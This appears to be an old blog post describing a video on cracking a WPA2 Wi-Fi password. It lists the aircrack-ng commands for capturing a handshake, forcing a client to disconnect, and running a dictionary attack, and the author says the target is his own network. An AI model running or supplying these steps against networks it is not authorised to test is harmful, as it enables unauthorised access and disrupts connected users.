Thursday, November 1, 2012

WPA2 Cracking with BackTrack 4 - 100.000 PWs in 6 Minutes (Dictionary Attack)_(360p).flv

WPA2 Cracking with BackTrack 4 - 100.000 PWs in 6 Minutes (Dictionary Attack)_(360p).flv Tube. Duration : 3.77 Mins.

Download File: EDUCATIONAL PURPOSES ONLY Ein kleines Video wo ich euch zeige wie ich mein eigenes Wlan mit WPA2 verschlüsselung cracke/hacke. Nach einen WPA Handshake wird das password mit einer pwliste gecrackt. (Dictionary Attacke) A little video where i show how i crack/hack my own WPA2 Wireless Box. After i got the wpa handshake, i used my own german pwlist to crack the password. (Dictionary Attack) Commands: 1. airodump-ng mon0 2. airodump-ng -c (channel) -w (filename to save data) --bssid (BSSID) mon0 3. aireplay-ng -0 0 -a (BSSID) -c (Station) mon0 4. aircrack-ng (file)-01.cap 5. aircrack-ng -w (pwlist) (file)-01.cap Software: Windows + VMWare + BackTrack 4 Pre Release USB-Adapter Wireless-G (TP-Link TL-WN321G)


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